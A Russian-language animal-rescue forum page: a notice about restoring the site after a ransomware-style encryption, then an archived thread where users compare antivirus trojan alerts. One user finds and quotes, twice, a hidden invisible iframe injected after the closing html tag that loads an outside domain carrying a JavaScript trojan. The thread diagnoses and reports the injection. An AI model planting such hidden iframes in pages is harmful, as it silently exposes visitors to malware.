Уважаемые пользователи!

Восстановление сайта продолжается, однако для всесторонней диагностики и выявления потенциальных проблем необходимо обеспечить его функционирование в рабочем режиме.

Осуществлен переход на новый движок сайта, установлена его самая актуальная версия, что предоставит пользователям расширенные возможности и улучшенный функционал.

К сожалению, противоправные действия злоумышленников существенно осложнили процесс восстановления. В результате их вмешательства вся информация, хранящаяся на сервере, оказалась недоступной.
Огромная благодарность команде программистов, чья работа позволила извлечь из зашифрованного сайта более 70% данных. Работа по восстановлению информации продолжается, и существует вероятность полного возврата всего содержимого сайта, но данный процесс может занять несколько месяцев.

Все старые учетные записи пользователей восстановлены в системе (за исключением адресов электронной почты и паролей). Для получения доступа к вашим аккаунтам, пожалуйста, обратитесь к администратору сайта через кнопку "Связаться с администрацией" (доступен на ПК) или посредством значка конверта (в мобильной версии сайта), расположенного в нижней части страницы. Регистрация для отправки запроса не требуется.
Часть относительно новых ников пропала совсем, часть из них обозначается как ник ХХХХХ, их также можно восстановить, обращайтесь на почту.
ТЕСТ2ТЕСТ2

Ищу хозяина

• WhatsApp Image 2025-05-14 at 15.47.05_f7b63e16.jpg
  • image.jpg
  • image.jpg
  • image.jpg
  • image.jpg
  • image.jpg
  • image.jpg
  • image.jpg
  • image.jpg

предупреждение о вирусе (комп.)

JuliaE

предупреждение о вирусе (комп.)

Сообщение JuliaE »

сразу скажу, что я компьютерный чайник, и возможно зря всполошилась, но сегодня каждый раз при заходе на "хвосты" активизируется антивирус, и говорит, что файл, возможно, содержит троян. После этого все очень медленно грузится. Что бы это значило? Что-то у нас часто перед выходными неполадки какие-то...
Astra

Re: предупреждение о вирусе (комп.)

Сообщение Astra »

JuliaE писал(а):сразу скажу, что я компьютерный чайник, и возможно зря всполошилась, но сегодня каждый раз при заходе на "хвосты" активизируется антивирус, и говорит, что файл, возможно, содержит троян. После этого все очень медленно грузится. Что бы это значило? Что-то у нас часто перед выходными неполадки какие-то...

у меня то же самое на протяжении часов 2х-3х :(
ЮлияSt

Сообщение ЮлияSt »

странно. мой лицензионный Симантек молчит :?
Хлоя

Сообщение Хлоя »

Проверила. Пока все нормально.
JuliaE

Сообщение JuliaE »

Спасибо
Kerri

Сообщение Kerri »

У меня Аваст.Тоже орет что Троян и вырубает соеденение
Мария

Сообщение Мария »

Kerri писал(а):У меня Аваст.Тоже орет что Троян и вырубает соеденение

то же самое.(((
Ж
Жизель

Сообщение Жизель »

DrWeb лицензия, молчит, гад :?
Caterina

Сообщение Caterina »

Касперский спокоен...
crocodila

Сообщение crocodila »

Касперский 2009 молчит как рыба
Мария

Сообщение Мария »

На втором компе лец.Касперский молчит.
Tessa

Сообщение Tessa »

Касперский 2007 предупредил
JuliaE

Сообщение JuliaE »

у меня тоже Касперский, предупреждает
Марина и гончие

Сообщение Марина и гончие »

У Авиры все спокойно, молчит.
Элен

Сообщение Элен »

JuliaE писал(а):у меня тоже Касперский, предупреждает
аналогично
Лара Райт

Сообщение Лара Райт »

NOD 32 лицензионный молчит.
Tami

Сообщение Tami »

У меня и Нод и Касперский молчат. Хотя периодически выкидывает...
*Angel*

Сообщение *Angel* »

Saskia писал(а):NOD 32 лицензионный молчит.

а у меня уже визжит, как потерпевший.. от вирусов..
O
OlgaD

Сообщение OlgaD »

Касперский орет про троян... Еще с таким противным ржанием это делает...
Tina

Сообщение Tina »

аваст молчит как партизан..
Таллула

Сообщение Таллула »

Нод 32 - орет как белуга....... , боится Трояна , успокаиваю как могу....
MARMYSIK

Сообщение MARMYSIK »

у меня вчера на работе все накрылось медным тазом, в понедельник придется восстанавливать.был подключен только сайт хвосты :(
t
tanyab

Сообщение tanyab »

у меня nod32 стал орать о вирусах

пишет JS/Kryptik.B. троян
Катерли

Сообщение Катерли »

а у меня Нод 32 молчит..наверное еще непуганый, мы его недавно установили :)
t
tanyab

Сообщение tanyab »

Катерли писал(а):а у меня Нод 32 молчит..наверное еще непуганый, мы его недавно установили :)

У меня молчал, сегодня переставляли все на компе и стал орать)
Helena

Сообщение Helena »

У меня также антивирус Nod32, как и у многих, он тут же предупредил о наличии трояна на главное странице сайта (на странице форума ошибки не возникает). Немного порывшись в html-коде страничек, я обнаружил, что после закрытого тега </html> следует достаточно удивительный код:

<iframe src="https://webexperience13.com/?click=-1338249936" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>.

Для тех, кто не разбирается в html-тегах: этот код создает что-то вроде окошка в основной странице (причем, НЕвидимого окошка), которое загружает "абсолютно левую страницу" - https://webexperience13.com/?click=-1338249936, которая, собственно, и содержит JavaScript-Троян.

Убедительная просьба создателей, Именно создателей, не модераторов и администраторов форума, а создателей сайта удалить этот код.

P.S.: Вполне вероятно, что этот код способствует "накрутке" какой-либо рекламной рассылки, как следствие позволяет "зарабатывать на сайте деньги". Но, по моему мнению, цель сайта вовсе не в заработке, а в помощи животным.

P.P.S.: С уважением, сын "Helena" - Лены.
masha-piter909

Сообщение masha-piter909 »

Мой Доктор Веб тож молчит :O
*Angel*

Сообщение *Angel* »

Helena писал(а):У меня также антивирус Nod32, как и у многих, он тут же предупредил о наличии трояна на главное странице сайта (на странице форума ошибки не возникает). Немного порывшись в html-коде страничек, я обнаружил, что после закрытого тега </html> следует достаточно удивительный код:

<iframe src="https://webexperience13.com/?click=-1338249936" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>.

Для тех, кто не разбирается в html-тегах: этот код создает что-то вроде окошка в основной странице (причем, НЕвидимого окошка), которое загружает "абсолютно левую страницу" - https://webexperience13.com/?click=-1338249936, которая, собственно, и содержит JavaScript-Троян.

Убедительная просьба создателей, Именно создателей, не модераторов и администраторов форума, а создателей сайта удалить этот код.

Поддерживаю. Знакомый компьютерщик объяснил то же самое. :(
Tami

Сообщение Tami »

Helena писал(а):У меня также антивирус Nod32, как и у многих, он тут же предупредил о наличии трояна на главное странице сайта (на странице форума ошибки не возникает). Немного порывшись в html-коде страничек, я обнаружил, что после закрытого тега </html> следует достаточно удивительный код:

P.S.: Вполне вероятно, что этот код способствует "накрутке" какой-либо рекламной рассылки, как следствие позволяет "зарабатывать на сайте деньги". Но, по моему мнению, цель сайта вовсе не в заработке, а в помощи животным.

P.P.S.: С уважением, сын "Helena" - Лены.

Может быть, надо это вынести как-то в заголовок? Создатели сайта вряд ли читают все темы?
Марина и гончие

Сообщение Марина и гончие »

Helena писал(а):Немного порывшись в html-коде страничек, я обнаружил, что после закрытого тега </html> следует достаточно удивительный код:

А почему до сих пор молчали антивири? :?
Ответить

Вернуться в «Архив, форум»